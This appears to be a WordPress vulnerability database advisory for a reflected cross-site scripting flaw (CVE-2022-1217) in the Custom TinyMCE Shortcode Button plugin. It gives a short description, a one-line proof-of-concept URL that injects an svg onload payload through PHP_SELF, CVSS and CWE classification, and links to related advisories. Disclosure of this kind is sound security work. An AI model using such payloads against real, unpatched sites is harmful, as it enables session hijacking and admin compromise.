WordPress Plugin Vulnerabilities

Custom TinyMCE Shortcode Button <= 1.1 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the PHP_SELF variable before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting.

Proof of Concept

https://example.com/wp-admin/options-general.php/%22%3E%3Csvg/onload=alert(/xss/)%3E?page=stscb-page-elements

Affects Plugins

Plugin icon
custom-tinymce-shortcode-button
No known fix

References

CVE
CVE-2022-1217

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
p7e4
Submitter
p7e4
Submitter website
https://github.com/p7e4
Submitter twitter
p7e4_
Verified
Yes
WPVDB ID
15875f52-7a49-44c7-8a36-b49ddf37c20c

Timeline

Publicly Published
2022-04-19 (about 1 years ago)
Added
2022-04-19 (about 1 years ago)
Last Updated
2022-04-20 (about 1 years ago)

Other

Published
Title
Published
2023-08-07
Title
Leyka < 3.30.3 - Reflected XSS
Published
2014-09-17
Title
WP Photo Album Plus 5.4.5 - 5.4.8 Stored XSS
Published
2023-04-03
Title
WP FEvents Book <= 0.46 - Subscriber+ Stored XSS
Published
2021-06-10
Title
Real Estate 7 < 3.1.1 - Reflected Cross-Site Scripting (XSS)
Published
2022-06-17
Title
Dyslexiefont Free < 1.0.0 - Authenticated Cross-Site Scripting